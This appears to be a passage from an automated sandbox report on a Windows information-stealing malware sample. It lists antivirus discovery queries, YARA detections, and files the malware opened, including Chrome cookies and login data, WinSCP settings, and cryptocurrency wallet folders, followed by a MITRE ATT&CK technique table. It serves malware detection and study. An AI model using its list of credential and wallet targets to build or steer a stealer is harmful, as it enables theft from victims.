                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_004092CF cpuid 14_2_004092CF
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040919C LocalAlloc,GetTimeZoneInformation,LocalAlloc,wsprintfW,LocalFree,14_2_0040919C
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040A672 LocalAlloc,GetUserNameW,14_2_0040A672
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 21.0.namdoitntn.exe.d30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jshainx.exe.220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000015.00000000.309615182.0000000000D32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.314893587.0000000000233000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: namdoitntn.exe PID: 4940, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: safert44.exe PID: 5840, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jshainx.exe PID: 6160, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, type: DROPPED
                    Source: Yara matchFile source: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 14.2.F0geI.exe.5d0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.kukurzka9000.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.kukurzka9000.exe.2390174.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.kukurzka9000.exe.2390174.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.F0geI.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.F0geI.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.kukurzka9000.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.3.F0geI.exe.5e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.3.F0geI.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.F0geI.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.406575357.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.308958287.0000000000713000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.398228449.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.413737168.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.390750632.000000000070C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.357431228.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.304422809.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.459641391.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: F0geI.exe PID: 7840, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: real.exe PID: 5308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: brokerius.exe PID: 7612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WW1.exe PID: 7760, type: MEMORYSTR
                    Source: F0geI.exe, 0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_electrum:Electrum;26;Electrum\wallets;*;-
                    Source: F0geI.exe, 0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
                    Source: F0geI.exe, 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\*C
                    Source: F0geI.exe, 0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*
                    Source: real.exe, 00000016.00000002.497130401.0000000027B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                    Source: F0geI.exe, 0000000E.00000002.462108656.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\*
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \jaxx\Local Storage\
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                    Source: q1wLT3xKiY.exeString found in binary or memory: Exodus Web3 Wallet
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                    Source: real.exe, 00000016.00000002.422757400.000000000150E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_walletn>
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file__0.localstorage
                    Source: real.exe, 00000016.00000002.497130401.0000000027B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: real.exe, 00000016.00000002.497130401.0000000027B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                    Source: real.exe, 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: F0geI.exe, 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???E
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???j
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???j
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???j
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???j
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???j
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???j
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???j
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???j
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                    Source: Yara matchFile source: 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.749365318.000000000159A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.416499811.000000000143A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.592193396.000000000063A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: F0geI.exe PID: 7840, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: namdoitntn.exe PID: 4940, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: real.exe PID: 5308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: safert44.exe PID: 5840, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jshainx.exe PID: 6160, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WW1.exe PID: 7760, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 21.0.namdoitntn.exe.d30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jshainx.exe.220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000015.00000000.309615182.0000000000D32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.314893587.0000000000233000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: namdoitntn.exe PID: 4940, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: safert44.exe PID: 5840, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jshainx.exe PID: 6160, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, type: DROPPED
                    Source: Yara matchFile source: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 14.2.F0geI.exe.5d0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.kukurzka9000.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.kukurzka9000.exe.2390174.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.kukurzka9000.exe.2390174.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.F0geI.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.F0geI.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.kukurzka9000.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.3.F0geI.exe.5e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.3.F0geI.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.F0geI.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.406575357.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.308958287.0000000000713000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.398228449.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.413737168.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.390750632.000000000070C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.357431228.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.304422809.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.459641391.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: F0geI.exe PID: 7840, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: real.exe PID: 5308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: brokerius.exe PID: 7612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WW1.exe PID: 7760, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts221
                    Windows Management Instrumentation
                    1
                    Registry Run Keys / Startup Folder
                    11
                    Process Injection
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium13
                    Ingress Tool Transfer
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts2
                    Native API
                    Boot or Logon Initialization Scripts1
                    Registry Run Keys / Startup Folder
                    11
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    Exfiltration Over Bluetooth22
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    PowerShell
                    Logon Script (Windows)Logon Script (Windows)31
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    4
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
